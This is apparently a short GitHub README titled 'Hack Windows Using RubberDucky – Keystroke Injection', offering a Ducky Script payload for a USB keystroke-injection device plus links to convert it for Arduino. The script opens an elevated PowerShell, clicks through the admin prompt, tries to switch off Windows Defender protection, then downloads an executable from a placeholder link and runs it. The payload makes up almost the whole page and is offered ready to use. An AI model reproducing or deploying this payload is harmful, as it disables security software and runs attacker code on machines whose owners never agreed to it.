Skip to content

Latest commit

 

History

History
25 lines (20 loc) · 624 Bytes

File metadata and controls

25 lines (20 loc) · 624 Bytes

Hack Windows Using RubberDucky – Keystroke Injection

Ducky Script Command Reference

#Ducky to Arduino

https://d4n5h.github.io/Duckuino/

#Arduino IDE

https://www.arduino.cc/en/software

DELAY 200
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 900
STRING Set-MpPreference -DisableRea $true; 
$d = New-Object System.Net.WebClient; 
$f = '1.exe'; 
$d.DownloadFile('YOUR PAYLOAD DOWNLOAD LINK',$f); 
$e = New-Object -com shell.application; $e.shellexecute($f); 
exit; ```